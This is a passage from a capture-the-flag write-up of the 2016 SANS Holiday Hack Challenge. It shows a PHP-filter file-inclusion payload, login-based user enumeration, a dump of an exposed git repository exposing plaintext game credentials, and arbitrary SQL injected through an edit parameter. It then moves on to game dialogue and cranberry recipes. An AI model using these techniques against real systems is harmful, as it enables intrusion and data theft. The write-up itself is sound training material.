We had another option for the operation at the beginning, ReadCrashDump. Lets see what this one does.

{“operation”:”ReadCrashDump”, “data”:”merryxmas”}

Fatal error! JSON key ‘crashdump’ must be set.

OK lets set that key  assuming crashdump should reference an existing crashdump to read. {“operation”:”ReadCrashDump”, “data”:”merryxmas”, “crashdump”:”crashdump-AMnahP.php“}

Fatal error! JSON key ‘crashdump’ must be set.

Lets try putting crashdump in to data {“operation”:”ReadCrashDump”, “data”:{“crashdump”:”crashdump-AMnahP.php”}}

Fatal error! crashdump value duplicate ‘.php’ extension detected.

and remove the extension {“operation”:”ReadCrashDump”, “data”:{“crashdump”:”crashdump-AMnahP”}}

“merryxmas”

Great we were able to read back the contents of the file from our original POST. I started going after some standard files like passwd shadow etc and i was getting nothing. I was trying to read the source for exception.php page when i remembered something I saw in the NorthPole. Sugarplum Mary was talking about PHP filters and local file inclusion attacks. She links to a blog post that’s probably going to help us.

Lets try reading the exception.php page again, remembering that it adds the .php extension on this is our new request.

{“operation”:”ReadCrashDump”, “data”:{“crashdump”: “php://filter/convert.base64-encode/resource=exception”}}

Success we are greeted with a chunk of base64 that decodes to the source code for exception.php

<?php 

# Audio file from Discombobulator in webroot: discombobulated-audio-6-XyzE3N9YqKNH.mp3

# Code from http://thisinterestsme.com/receiving-json-post-data-via-php/
# Make sure that it is a POST request.
if(strcasecmp($_SERVER['REQUEST_METHOD'], 'POST') != 0){
    die("Request method must be POST\n");
}
   
# Make sure that the content type of the POST request has been set to application/json
$contentType = isset($_SERVER["CONTENT_TYPE"]) ? trim($_SERVER["CONTENT_TYPE"]) : '';
if(strcasecmp($contentType, 'application/json') != 0){
    die("Content type must be: application/json\n");
}
  
# Grab the raw POST. Necessary for JSON in particular.
$content = file_get_contents("php://input");
$obj = json_decode($content, true);
  # If json_decode failed, the JSON is invalid.
if(!is_array($obj)){
    die("POST contains invalid JSON!\n");
}

# Process the JSON.
if ( ! isset( $obj['operation']) or (
  $obj['operation'] !== "WriteCrashDump" and
  $obj['operation'] !== "ReadCrashDump"))
  {
  die("Fatal error! JSON key 'operation' must be set to WriteCrashDump or ReadCrashDump.\n");
}
if ( isset($obj['data'])) {
  if ($obj['operation'] === "WriteCrashDump") {
    # Write a new crash dump to disk
    processCrashDump($obj['data']);
  }
  elseif ($obj['operation'] === "ReadCrashDump") {
    # Read a crash dump back from disk
    readCrashdump($obj['data']);
  }
}
else {
  # data key unset
  die("Fatal error! JSON key 'data' must be set.\n");
}
function processCrashdump($crashdump) {
  $basepath = "/var/www/html/docs/";
  $outputfilename = tempnam($basepath, "crashdump-");
  unlink($outputfilename);
  
  $outputfilename = $outputfilename . ".php";
  $basename = basename($outputfilename);
  
  $crashdump_encoded = "<?php print('" . json_encode($crashdump, JSON_PRETTY_PRINT) . "');";
  file_put_contents($outputfilename, $crashdump_encoded);
      
  print <<<END
{
  "success" : true,
  "folder" : "docs",
  "crashdump" : "$basename"
}

END;
}
function readCrashdump($requestedCrashdump) {
  $basepath = "/var/www/html/docs/";
  chdir($basepath);		
  
  if ( ! isset($requestedCrashdump['crashdump'])) {
    die("Fatal error! JSON key 'crashdump' must be set.\n");
  }

  if ( substr(strrchr($requestedCrashdump['crashdump'], "."), 1) === "php" ) {
    die("Fatal error! crashdump value duplicate '.php' extension detected.\n");
  }
  else {
    require($requestedCrashdump['crashdump'] . '.php');
  }	
}

?>

And right at the top of the page a link to our next mp3.

http://ex.northpolewonderland.com/discombobulated-audio-6-XyzE3N9YqKNH.mp3

We are told there is another audio file on the analytics site that we need to collect after logging in.

After logging in with the guest account as well as the mp3 there are some options to query data from one of two analytics sets. Launch and Usage. We also have the option to save these queries as reports.

the obvious thing to try here is sql injection, i try some basic injection techniques but nothing seems to work, i even get heavy handed and throw sqlmap at it with no luck.

What about trying to logon as another user? Fortunately it is really easy to enumerate users from the login page. If a user doesn’t exist we are presented with:

 {“result”:401,”msg”:”No such user!”}

And if we find a valid user with an incorrect password we get:

{“result”:401,”msg”:”Bad password!”}

This lets us figure out there is an ‘administrator’ account but we don’t know the password for it. After trying some words that had been picked up through the other challenges nothing was working and i was contemplating a brute force attack with hydra, especially as the response is easy to read. Before i did this I was reading back though the notes i had been making to see if i had missed something, turns out i had.

The first thing i would do on each IP was to run an NMAP scan. And the nmap scan had returned an interesting item i had completely overlooked.

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 5d:5c:37:9c:67:c2:40:94:b0:0c:80:63:d4:ea:80:ae (DSA)
|   2048 f2:25:e1:9f:ff:fd:e3:6e:94:c6:76:fb:71:01:e3:eb (RSA)
|_  256 4c:04:e4:25:7f:a1:0b:8c:12:3c:58:32:0f:dc:51:bd (ECDSA)
443/tcp open  ssl/http nginx 1.6.2
| http-git: 
|   104.198.252.157:443/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Finishing touches (style, css, etc) 
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.6.2
| http-title: Sprusage Usage Reporter!
|_Requested resource was login.php

nmap had found a Git repository. we can use wget to pull down all the files.

wget -r --no-parent https://analytics.northpolewonderland.com/.git/

which gives us: Downloaded: 314 files, 1003K in 0.8s (1.25 MB/s)

With the git folder pulled down i clean up the wget by removing all the generated index.html pages.

[email protected]:~# cd analytics.northpolewonderland.com/.git
[email protected]:~/analytics.northpolewonderland.com/.git# find . -name index.html -exec rm {} +

As this is a git repo lets see if we can read the git log.

Yes we can and that’s a lot of information.

[email protected]:~/analytics.northpolewonderland.com/.git# git log
commit 16ae0cbe2630a87c0470b9a864bf048e813826db
Author: me <[email protected]>
Date:   Fri Dec 2 19:42:15 2016 +0000

    Finishing touches (style, css, etc)

commit 106079e728c97ebea387042a2e076fab62952e1e
Author: me <[email protected]>
Date:   Tue Nov 22 17:51:52 2016 -0800

    Got rid of mysqli_fetch_all(), which isn't widely supported

commit e46b41e391ee0e9f4afab7880982501ac1471fb4
Author: me <[email protected]>
Date:   Mon Nov 21 21:19:11 2016 -0800

    HTML escape more output values on the test page

commit 935d79726e13ab65c3b5baa4d925de86059057d4
Author: me <[email protected]>
Date:   Mon Nov 21 21:18:49 2016 -0800

    HTML escape an output value on the test page

commit 62547860f9a6e0f3a3bdfd3f9b14fea3ac7f7c31
Author: me <[email protected]>
Date:   Mon Nov 21 21:15:08 2016 -0800

    Fix database dump

commit 85a4207c178fa0f9c6b6bb77a6d42eac487159c0
Author: me <[email protected]>
Date:   Mon Nov 21 21:14:36 2016 -0800

    Saved queries now save the query object instead of the results

commit 45edadc1850c3894ab8850d1d77dca9a074a3a6a
Author: me <[email protected]>
Date:   Mon Nov 21 20:50:40 2016 -0800

    Update README.md to reflect the actual current state

commit 885ec6a4e870ce983aecde3a4f0e398b6a76615f
Author: me <[email protected]>
Date:   Mon Nov 21 20:49:23 2016 -0800

    Update report.php to log actual data to the database instead of static strings

commit 58c900fd53fced0d588e00e23c26cb8465eed498
Author: me <[email protected]>
Date:   Fri Nov 18 22:35:53 2016 -0800

    Add view.php

commit 43970092ea851cff05e44aba3e0a67eb351304f3
Author: me <[email protected]>
Date:   Fri Nov 18 22:20:08 2016 -0800

    Remove unnecessary data from the database dump

commit 1908b71d42bce15345cabb7a63f57b5c79b85d15
Author: me <[email protected]>
Date:   Fri Nov 18 22:19:21 2016 -0800

    Update the database dump

commit 0778ac7de1d7ff8ae46ebabdee33a340ab9506f3
Author: me <[email protected]>
Date:   Fri Nov 18 22:10:10 2016 -0800

    Reports can now be saved

commit 1562064538562f077d388044e344e3c2d85450d7
Author: me <[email protected]>
Date:   Fri Nov 18 21:39:30 2016 -0800

    Add a fairly complex query page for looking up records

commit 259d406f3f2345b50338d54a53efa36dd08f6f20
Author: me <[email protected]>
Date:   Fri Nov 18 19:51:47 2016 -0800

    Add a header, a footer, and a logout page

commit 2689a45ab9c38d92675660b9113fc173a0ccf129
Author: me <[email protected]>
Date:   Mon Nov 14 20:34:42 2016 -0800

    Fix the database dump

commit cf5f27b161f53d62f97ad6ebc648701288a2ea89
Author: me <[email protected]>
Date:   Mon Nov 14 20:33:27 2016 -0800

    Change the database and application/test script to use the real field names instead of fake names

commit 6ab9fe6ec3de2e28b79108ff5110643e9ba32478
Author: me <[email protected]>
Date:   Sun Nov 13 21:13:20 2016 -0800

    Add login to the HTML side of things

commit 02e8d14ffa8910bfd5365ff36eb96bcd7efc4409
Author: me <[email protected]>
Date:   Sun Nov 13 20:27:31 2016 -0800

    Add a HTML login page, and refactor a little to make check_user() usable by both JSON and HTML

commit f0d28ed3cc39538a6c415789408ef3f24ded959c
Author: me <[email protected]>
Date:   Sun Nov 13 20:06:13 2016 -0800

    Move some functions into this_is_json.php

commit d9636a3d648e617fcb92055dea63ac2469f67c84
Author: me <[email protected]>
Date:   Sun Nov 13 19:22:22 2016 -0800

    Small authentication fix

commit 5f0c135e1479d865945577c0a70d0cf39e49cdc7
Author: me <[email protected]>
Date:   Sun Nov 13 19:19:32 2016 -0800

    Add authentication

commit 420f433fe33d14abac5c3a588c3e753d0d71d50d
Author: me <[email protected]>
Date:   Sun Nov 13 18:37:10 2016 -0800

    Add some basic write-to-the-database functionality

commit bb2646691fc9f6bf5f1a0ade746b28f8147ffa48
Author: me <[email protected]>
Date:   Sun Nov 13 18:25:23 2016 -0800

    Add a bit of database functionality

commit 1057b70e7681f44aac2789e26a2b714327d8c203
Author: me <[email protected]>
Date:   Sun Nov 13 18:11:31 2016 -0800

    Add a script to test the API

commit d63a7e0df35ad525fa40eceae67be5b27215ece8
Author: me <[email protected]>
Date:   Sun Nov 13 18:10:45 2016 -0800

    Added the start of a reporting page

But we still don’t have any source code which is what i really want so i can find the final audio file.

I can’t check out a branch git complains about a work tree. Looking at all the contents of the folder we have, we can see an objects directory that contains a lot of files with seeming random data. As it turns out these are git objects, every time a file is created or modifed it gets an object file with contains the content of the file and some meta data. Even better for us there are ways to recover the data if all we have are the objects directory.

We initialize an empty git repository, copy in our objects directory, use gits built in repair functionality then checkout a branch by its commit hash.

[email protected]:~$ mkdir tempgit
[email protected]:~$ cd tempgit
[email protected]:~/tempgit$ git init
Initialised empty Git repository in /home/thehermit/tempgit/.git/
[email protected]:~/tempgit$ cd .git
[email protected]:~/tempgit/.git$ cp -R ../../analytics.northpolewonderland.com/.git/objects .
[email protected]:~/tempgit/.git$ cd ..
[email protected]:~/tempgit$ git fsck --full
notice: HEAD points to an unborn branch (master)
Checking object directories: 100% (256/256), done.
notice: No default references
dangling commit 16ae0cbe2630a87c0470b9a864bf048e813826db
dangling blob 7b9389b70b24166f782b755d960c7b017f78719d
[email protected]:~/tempgit$ git checkout 16ae0cbe2630a87c0470b9a864bf048e813826db
Note: checking out '16ae0cbe2630a87c0470b9a864bf048e813826db'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:

  git checkout -b new_branch_name

HEAD is now at 16ae0cb... Finishing touches (style, css, etc)
[email protected]:~/tempgit$ ls
crypto.php  edit.php    getaudio.php  js          mp3.php    report.php    this_is_html.php  view.php
css         fonts       header.php    login.php   query.php  sprusage.sql  this_is_json.php
db.php      footer.php  index.php     logout.php  README.md  test          uuid.php
[email protected]:~/tempgit$

Now we can see the source for all the files, including an SQL file. Checking the file we can see the schema for all the tables, including an audio table.

DROP TABLE IF EXISTS `audio`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `audio` (
  `id` varchar(36) NOT NULL,
  `username` varchar(32) NOT NULL,
  `filename` varchar(32) NOT NULL,
  `mp3` MEDIUMBLOB NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

Sadly the sprusage.sql file only contains the database schema it doesn’t contain any of the table data. Or at least now it doesn’t. One of the commits we saw from the git history was ‘Remove unnecessary data from the database dump’ We can jump to the repository at a commit before this point and see what is contained in this file.

git checkout 1908b71d42bce15345cabb7a63f57b5c79b85d15

The audio table did not exist at this point in the repo but we did find the administrator account

--
-- Dumping data for table `users`
--

LOCK TABLES `users` WRITE;
/*!40000 ALTER TABLE `users` DISABLE KEYS */;
INSERT INTO `users` VALUES (0,'administrator','KeepWatchingTheSkies'),(1,'guest','busyllama67');
/*!40000 ALTER TABLE `users` ENABLE KEYS */;

Which still works :)

After logging in with the administrator account we notice the MP3 link we had before is now replaced with an Edit link. Fortunately we have the source for all these pages so we don’t need to stumble around. (Make sure to checkout the latest version of the git)

Checking ‘getaudio’ and ‘mp3’ php files, it seems like its pretty well locked to only giving out the guest mp3 file. All the php files seem to be secure against SQL injection, which matches my previous experience. So lets have a look at our new edit.php file.

On the surface of things it looks pretty simple. It lets us update the Name and Description for any stored report. We can confirm this by running a query and saving the report and then using the edit page with the report ID we just generated.

But how does this help us?

When you take a closer look at the php page and the output you notice that the new SQL values are not being set by name. Its a for loop iterating over the GET parameters and checking to see if they are valid column names. Name and description are valid so are updated but its also checking for a field called query, which is not included in the HTML form. Lets create a new request that contains something in this query field.

Worth a shot. https://analytics.northpolewonderland.com/edit.php?id=f73d5f04-ebca-439c-822a-4ad1214803e3&name=a&description=b&query=SELECT * FROM audio

The output suggest that the update was successful.

Checking for id...
Yup!
Checking for name...
Yup!
Checking for description...
Yup!
Checking for query...
Yup!
UPDATE `reports` SET `id`='f73d5f04-ebca-439c-822a-4ad1214803e3', `name`='a', `description`='b', `query`='SELECT * FROM audio' WHERE `id`='f73d5f04-ebca-439c-822a-4ad1214803e3'Update complete!

but how do we view the results of our query? Lets take a look at the report page using the View query – https://analytics.northpolewonderland.com/view.php?id=f73d5f04-ebca-439c-822a-4ad1214803e3

And there is the output from our query.

We can tell from the sql file that the mp3 is stored as a blob in the db itself not as a file on disk, and we know that we cant get our mp3 using the getauadio function as that’s locked to the guest track. My first thought is to use INTO OUTFILE but that function doesn’t seem to be enabled or working.

After reading up on exporting data from MySQL i found a function that might help TO_BASE64() which does as it says on the tin, displays the column as base64 data.

With this in hand we create a new query.

SELECT username,filename,TO_BASE64(mp3) from audio
https://analytics.northpolewonderland.com/edit.php?id=f73d5f04-ebca-439c-822a-4ad1214803e3&name=a&description=b&query=SELECT%20username,filename,TO_BASE64(mp3)%20from%20audio

Success, looking at our report with the new query we have the mp3 data as base64.

Which we can copy out to file then decode back in to an mp3.

[email protected]:~$ cat mp3b64.txt | base64 --decode > discombobulatedaudio7.mp3
[email protected]:~$ file discombobulatedaudio7.mp3
discombobulatedaudio7.mp3: Audio file with ID3 version 2.3.0, contains: MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, JntStereo

And that gives us the final audio file. discombobulatedaudio7.mp3

We have all 7 audio clips:

  1. discombobulatedaudio1.mp3
  2. discombobulatedaudio2.mp3
  3. discombobulatedaudio3.mp3
  4. debug-20161224235959-0.mp3
  5. discombobulatedaudio5.mp3
  6. discombobulated-audio-6-XyzE3N9YqKNH.mp3
  7. discombobulatedaudio7.mp3

time to put them all back together again. Listening to each track it sounds like it is being played at a really low speed. so lets see what happens if we speed them back up. Using audacity we can increase the tempo if each track. Its important to increase tempo as this maintains the pitch and prevents ‘chipmunking’ of the audio.

Increasing the tempo by about 500% (400 then a second time at 100) gets us an audio sample that’s clear enough to understand.

 

Father Christmas. Santa Claus. Or, as I’ve always known him, Jeff.

A quote from the Dr Who Christmas Special. We have one room which is still password protected. This quote opens the door in the Corridor behind Santa’s Office and leads us up to The ClockTower where we find our Evil Villain Dr. Who.

He has a lot to say about why he did what he did.

And with all that said the credits begin to Roll. With Santa rescued and back to work, The villain revealed and the time line apparently safe our work here is done. Just a check of all our Quests to make sure we have completed them all.

Once you arrive at the Dosis home you find you are faced with 4 Quests and 21 Achievements. Each quest and achievement gets you one step closer to figuring out who kidnapped Santa.

Achievements:

There are 5 components that need to be collected. This slideshow shows all the locations. Use the main maps for reference

This slideshow requires JavaScript.

There are 20 coins spread around the North Pole both in the present and in the Past. This slideshow will point you at all the locations, Use the main Map for reference.

This slideshow requires JavaScript.

The final Achievement. Once you have all the Audio files. Or enough to complete the quote head to the Corridor behind Santa’s Office and use the full quote as the password to gain access to the Clock Tower. Up the stairs you find Dr Who who will explain his reasons to you.
<h2id=”links_maps”>Maps

The following Maps detail the layout of the North Pole and the Buildings. Click each image then zoom in for the full view.

Someone has abducted Santa Clause! We found his business card. And we’re the only ones who know that Santa’s been abducted. We’ve got to do something… let’s look at this card to see if it can be any help in finding out what happened to Santa!

Who would do such a thing? And on Christmas Eve no less. They’ll destroy Christmas! But why? We found Santa’s business card. It must have fallen out of his pocket while someone was kidnapping him.

Hi, I’, Holly Evergreen. Welcome to the North Pole Wonderland! I’m glad you’re here. We need help finding Santa! He was delivering toys to good girls and boys, but he disappeared mysteriously. We saw his sleigh overhead, and some elves have found and collected pieces that fell to the ground.

Have you met the Oracle? He is the wisest of the wise., and we all manage the scope of the projects through him. You should check with him before attacking any systems.

Santagram? All of Santa’s bug bounty elves are on it. I hope I get promoted to that team someday. With all the pieces of the Cranberry Pi and the Cranbian password, you’ll be able to access the terminals through the North Pole Wonderland. Just walk up to and access any terminal with this logo. Maybe the terminals will offer some clues for finding Santa. If you lose it, you can always download the Cranbian image again.

Hi, I’m Sparkle Redberry. I’m a little distraught a the moment. A lot of the North Pole Wonderland elves work in the bug bounty team. That’s how Santa finances this whole North Pole Operation. I’m working to build my skills to contribute more to the team. Each time i master a pen testing skill area, I get a NetWars challenge coin. I’ve got a hole in my pocket, and I’ve lost my NetWars coins. Do you think you could help me find them? It would mean the world to me!

Hi, I’m Wunorse Openslae. I work on engineering projects for Santa. A lot of people don’t know this but his sleigh can travel through space and time. I’m quite proud. The SCADA interface for sleigh functions is controlled with a Cranberry Pi and Cranbian Linux. It’s really powerful to be able to switch out firmware builds by swapping SD cards.

Dealing with piles of SD cards though, that’s a different story. Fortunately, this article gave me some ideas on better data management. SantaGram? Yeah it’s popular up here. #elflife

Hi, I’m Sugarplum Mary. I’m a developer! I like PHP, it offers so much flexibility even though the syntax is straight out of 1978. PHP Filters can be used to read all kinds of I/O streams. As a developer, I must be careful to ensure attackers can’t access sensitive files or data.

Jeff McJunkin wrote a blog post on local file inclusions using this technique. I need to go back and make sure no one can read my source code using this technique. I love curly braces and semicolons.

I am the great and powerful oracle, also known as Tom Hessman. If you enter some text, i will treat it as a question. Ask me about an IP address, I will tell you if it is in scope. You can only target those I approve, despite my entertaining trope.

I am a most marvelous machine.
I gather nice tunes from a holiday scene.
I then cut them and mix them and stir them about.
And across the North Pole, I send them all out!
And then you can smile and dance all the day.
To the jams i create, a music parfait!

Howdy, my name is Minty Candycane. I’m on the red team, Rudolph’s Red Team! I’ve been spending a lot of time with NMAP. Its such a great port scanner.! I’m very thorough so i Check all the TCP ports to look for extra services. NMAP is also great for finding extra files on web servers. The default scripts run with “-sC” option work really well for me. “First, YULE LOGon”! I crack people up.

Speaking of cracking, John The Ripper is fantastic for cracking hashes. It is good at determining the correct hashing algorithm. I have a lot of luck with the RockYou password list. Speaking of rocks, where do geologists like to relax? In a rocking chair. HA!

Hi, I’m Bushy Evergreen. Shinny and I lead the Android analysis team. Shinny spends most of her time on app reverse engineering. I prefer to analyze apps at the Android Bytecode layer. My favorite techinque? Decompiling Android Apps with Apktool. JadX is great for inspecting a Java representation of the app, but can’t be changed and then recompiled. With Apktool, I can preserve the functionality of the app, then change the android bytecode smali files. I can even change the values in Android XML files, then use Apktool again to recompile the app.

Apktool compiled apps can’t be installed and run until they are signed. The Java keytool and jarsigner utilities are all you need for that. This video on manipulating and re-signing Android apps is pretty useful.

Hi, my name is Pepper Minstix. I’m one of Santa’s bug bounty elves. Lately, I’ve been spending time attacking JavaScript frameworks, specifically the Meteor Framework. Meteor uses a publish/subscribe messaging platform. This makes it easy for a web page to get dynamic data from a server. Meteor’s message passing mechanism uses the Distributed Data Protocol (DDP). DDP is basically a JSON-based protocol using webSockets and SockJS for RPC and data management. The good news is that Meteor mitigates most XSS attacks, CSRF attacks and SQL injection attacks. The bad news is that people get a little too caught up in messaging subscriptions, and get too much data from the server. You should also check out Tim Medin’s talk from HackFest 2016 and the related blog post. Also Meteor Miner is a browser add-on for Tampermonkey to easily browse through Meteor Subscriptions. Check it out!

When i need a break from bug bounty work, I play Dungeon. I’ve been playing it since 1978. I still have yet to beat the Cyclops… Alabasters brother is the only elf I’ve ever seen beat it, and he really immersed himself in the game. I have an old version here.

Hi, my name is Shinny Upatree. I’m one of Santa’s bug bounty elves. I’m the newest elf on Santa’s bug bounty team. I’ve been spending my time reversing Android Apps. Did you know android APK files are just zip files? If you unzip them , you can look at the application files. Android apps written in Java can be reverse engineered back into the Java form using JadX. the JadX-gui tool is quick and easy to decompile an APK, but the jadx command-line tool will export the APK as individual Java Files. Android Studio can import JadX’s decompiled files. It makes it easier to understand obfuscated code. Take a look at Joshua Wrights presentation from HackFest 2016 on using Android Studio and JadX effectively.

Hay, I’m Jason. I guess I’m a hay bale this year.

 

Moo!

 

Well, hello there. You’ve rescued me! Thank you so much. I wish i could recall the cicumstances that lead me to be imprisoned here in my very own Dungeon For Errant Reindeer (DFER).  But i seem to be suffering from short-term memory loss. It feels almost as through someone hit me over the head with a Christmas Tree. I have no memory of what happened or who did that to me.

But this I do know. I wish i could stay here and proprly thank you, my friend. But it is Christmas Eve and I MUST get all of these presents delivered before sunrise! I bid you a VERY MERRY CHRSITMAS… AND A HAPPY NEW YEAR!

The question of the hour is this: Who nabbed Santa. The answer? Yes, I did.

Next Question: Why would anyone in his right mind kidnap Santa Clause? The answer: Do i look like I’m in my right mind? I.m a madman with a box. I have looked in to the the time vortex and I have seen a universe in which the Star Wars Holiday Special was NEVER released. In that universe, 1978 came and went as normal. No one had to endure the misery of watching that abominable blight. People were happy there. It’s a better life, I tell you, a better world than the scarred on we endure here. Give me a world like that. Just once.

So i did what I had to do. I knew that Santa’s powerful North Pole Wonderland Magick could prevent the Star Wars Special from being released, if I could leverage that magick with my own abilities back in 1978. But Jeff refused to come with me, insisting on the mad idea that it is better to maintain the integrity of the universe’s timeline. So i had no choice – I had to kidnap him. It was one of those days. Well. You know what i mean.

Anyway… Since you  interfered with my plan, we’ll have to live with the Star Wars Holiday Special in this universe … FOREVER. If we attempt to go back again, top cross our own timeline, we’ll cause a temporal paradox, a wound in time. We’ll never be rid of it now. The Star Wars Holiday Special will plague this world until time itself ends… All because you foiled my brilliant plan. Nice work.

Recipes

From Train Console

Just in case you wanted to know, here's a really good Cranberry pie recipe:
Ingredients
1 recipe pastry for a 9 inch double crust pie
1 1/2 cups white sugar
1/3 cup all-purpose flour
1/4 teaspoon salt
1/2 cup water 
1 (12 ounce) package fresh cranberries
1/4 cup lemon juice
1 dash ground cinnamon
2 teaspoons butter
Directions:
1) Preheat oven to 425 degrees F (220 degrees C.)
2) In a saucepan, combine sugar, flour, salt and water. Bring to a boil and cook, stir
ring constantly until thick and smooth. Add berries, lemon juice and cinnamon. Cook 5 
minutes until mixture is thick and berries pop. Remove from heat and stir in butter.
3) Roll one ball of dough out to fit a 9 inch pie plate. Place bottom crust in pie pla
te. Spoon in filling. Roll out top crust and cut into strips for lattice. Place lattic
e strips on top and seal edges.
4) Bake in the preheated oven for 40 minutes, or until crust is golden brown.

From CranPi Image

MMMMM----- Recipe via Meal-Master (tm) v7.07
 
      Title: Candied Cranberries
 Categories: Candies, Christmas
   Servings:  2
 
      1 c  Sugar
      2 tb Water
    1/2 c  Cranberries
 
  Cook 1/2 cup sugar and 2 tablespoons water in heavy small saucepan over low
  heat, stirring until sugar dissolves. Transfer to top of double boiler. Add
  cranberries. Cover berry mixture and place over simmering water. Cook 45
  minutes, stirring occasionally. Remove from over water. Let cranberry
  mixture stand at room temperature overnight.
  
  Place remaining 1/2 cup sugar on plate. Drain cranberries well. Add t sugar
  and turn to coat. Let dry at least 30 minutes. (Can be prepared 3 days
  ahead. Cover and refrigerate.)
  
  Makes about 1/2 cup

Cranberry-Jalapeno 

Salsa Finely chop 2 cups cranberries with 1/4 cup sugar in a food processor. Toss with 1/3 cup each chopped cucumber and cilantro, 1/4 cup chopped white onion, 1 minced jalapeno, 1 tablespoon lime juice and 1/2 teaspoon kosher salt.

Read more at: http://www.foodnetwork.com/recipes/articles/50-things-to-make-with-cranberries.html?oc=linkback

Cranberry Jelly 

Bring 4 cups cranberries, 2 cups sugar, 1 cup water, 2 tablespoons lemon juice and a pinch of salt to a boil. Reduce the heat to medium and simmer until the berries pop and the sauce thickens, 20 to 25 minutes; cool. Puree, then strain. Chill.

Read more at: http://www.foodnetwork.com/recipes/articles/50-things-to-make-with-cranberries.html?oc=linkback

Cranberry-Mint Chutney 

Bring 1 cup cranberries, 3/4 cup each sugar and water, 1/2 cup dried cranberries and a pinch of salt to a boil. Reduce the heat to medium; simmer until the berries pop and the chutney thickens, 10 minutes; cool slightly. Stir in 1/2 cup chopped cranberries, 1/4 cup chopped mint and 2 tablespoons cider vinegar.

Read more at: http://www.foodnetwork.com/recipes/articles/50-things-to-make-with-cranberries.html?oc=linkback

Cranberry-Port Sauce Cook 

1/3 cup minced red onion in 1 tablespoon butter over medium heat until softened. Add 1/2 cup ruby port; simmer until reduced by half. Add 1 cup cranberries, 3/4 cup chicken broth, 2 tablespoons each sugar and orange juice, and 1/4 teaspoon mustard powder. Simmer, lightly smashing the berries, until thickened, 10 minutes. Season with salt and pepper.

Read more at: http://www.foodnetwork.com/recipes/articles/50-things-to-make-with-cranberries.html?oc=linkback

Cranberry-Pear Sauce 

Simmer 4 cups cranberries, 2 chopped peeled pears, 2 cups water, 1 cup sugar and 1/2 teaspoon ground cardamom over medium heat until the berries pop and the sauce thickens, 25 minutes; cool.

Read more at: http://www.foodnetwork.com/recipes/articles/50-things-to-make-with-cranberries.html?oc=linkback

Directions
Empty a 12-ounce bag of fresh or frozen cranberries into a saucepan and transfer 1/2 cup to a small bowl. Add 1 cup sugar, 1 strip orange or lemon zest and 2 tablespoons water to the pan and cook over low heat, stirring occasionally, until the sugar dissolves and the cranberries are soft, about 10 minutes. Increase the heat to medium and cook until the cranberries burst, about 12 minutes. Reduce the heat to low and stir in the reserved cranberries. Add sugar, salt and pepper to taste and cool to room temperature before serving.
Photograph by Jonathan Kantor
Recipe courtesy of Food Network Magazine



Read more at: http://www.foodnetwork.com/recipes/food-network-kitchens/perfect-cranberry-sauce-recipe.html?oc=linkback

Sugared Cranberries 

Bring 1/2 cup each sugar and water to a boil. Pour over 1 1/2 cups cranberries. Cool 1 hour; drain. Roll in 1/2 cup sugar on a baking sheet. Let dry 4 hours.

Read more at: http://www.foodnetwork.com/recipes/articles/50-things-to-make-with-cranberries.html?oc=linkback

 

Well that’s all for this one looking forward to the next big shout out to @edskoudis and the SANS team for putting this together for another year. I am already looking forward to the next one.

As usual. Questions, Queries, Comments below.